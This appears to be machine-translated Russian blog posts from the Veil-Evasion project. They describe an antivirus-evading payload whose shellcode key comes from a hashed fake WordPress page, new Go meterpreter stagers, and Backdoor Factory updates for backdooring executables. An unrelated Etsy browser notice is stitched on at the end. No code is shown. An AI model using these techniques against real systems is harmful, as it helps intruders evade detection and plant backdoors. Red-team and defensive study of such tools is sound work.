    В этом месяце мы получили полезную нагрузку Python, созданную Alex Rymdeko-Harvey (@Killswitch_GUI)! Эта полезная нагрузка работает, когда пользователь указывает URL-адрес, на который должна возвращаться полезная нагрузка, и как часто она должна возвращаться. Ниже приводится пошаговое описание работы модуля:

    1. Модуль создаст веб-страницу, содержащую поддельный логин WordPress.
    2. Поддельная страница будет обработана md5ed, а хэш будет использоваться для шифрования шелл-кода, хранящегося внутри исполняемого файла.
    3. После того, как исполняемый файл будет размещен на машине и запущен, он будет указывать на указанный URL-адрес для поиска веб-страницы.
    4. Как только веб-сервер вернет 200, исполняемый файл выполнит md5 веб-страницу и попытается использовать этот хэш для расшифровки шелл-кода и выполнения его в памяти.
    5. Если страница не возвращает 200, исполняемый файл будет бездействовать до тех пор, пока не придет время снова отправить маяк.

    Преимущество этого модуля в том, что вы можете выбирать, когда ваши полезные нагрузки могут выполняться. Поскольку ключ не хранится в исполняемом файле, единственный случай, когда полезная нагрузка может внедрить свой шелл-код, — это когда страница, на которую он возвращается, активна.

    Если вы хотите узнать больше об этом, ознакомьтесь с записью в блоге автора здесь: http://cybersyndicates.com/2015/06/veil-evasion-aes-encrypted-httpkey-request-module/

    Спасибо и наслаждайтесь!

    Опубликовано Кристофер Трансер 0

    Всем привет!

    В этом месяце мы очень рады представить новый язык в Veil-Framework для обхода антивируса. На данный момент у нас есть Python, C, C#, Powershell и Ruby. Как вы, наверное, догадались, мы рады добавить поддержку Go!

    Чтобы использовать полезные нагрузки Go, первое, что вам нужно сделать, это повторно запустить сценарий установки, который поставляется в комплекте с Veil-Evasion. Это автоматически загрузит Go и скомпилирует из исходного кода методом, который позволяет go выполнять кросс-компиляцию и создавать исполняемые файлы Windows в Linux.

    После установки вы увидите, что в настоящее время в фреймворке доступны четыре различных полезных нагрузки Go. Одна из полезных нагрузок — это традиционная полезная нагрузка для внедрения шелл-кода, а другие — чистые стейджеры Go meterpreter. Полезные нагрузки Go были отправлены нам @b00stfr3ak44, и мы определенно благодарны за то, что они отправлены нам для использования сообществом!

    Мы хотели бы продолжать поощрять людей создавать новые полезные нагрузки на любом языке, который вы считаете интересным. Если вы захотите отправить нам созданную вами полезную нагрузку для включения в Veil-Evasion, мы будем рады сделать все возможное, чтобы помочь вам на этом пути.

    Спасибо!

    #авлол

    Опубликовано Кристофер Трансер 0

    Всем привет!

    Для нашего апрельского Дня Победы мы работали с нашим другом Джошем (@midnite_runr), чтобы получить последние обновления Backdoor Factory, добавленные в Veil-Evasion. В последнее время в Backdoor Factory было выпущено несколько обновлений, которые еще не были добавлены, но теперь мы должны включить их все. Одно из самых последних изменений включает в себя автоматическое исправление PE при бэкдоре исполняемого файла. @Midnite_runr работал над добавлением этой функции в течение некоторого времени, так что здорово, что его тяжелая работа окупилась! Он задокументировал много обновлений в этом видео.

    Если у вас есть какие-либо вопросы, не стесняйтесь задавать их в #Veil на Freenode, и спасибо @midnite_runr за его потрясающую работу!

    Опубликовано Кристофер Трансер 0

    Window Veil — Etsy.de

    Etsy больше не поддерживает старые версии вашего веб-браузера, чтобы обеспечить безопасность пользовательских данных. Пожалуйста, обновите до последней версии.

    Воспользуйтесь всеми преимуществами нашего сайта, включив JavaScript.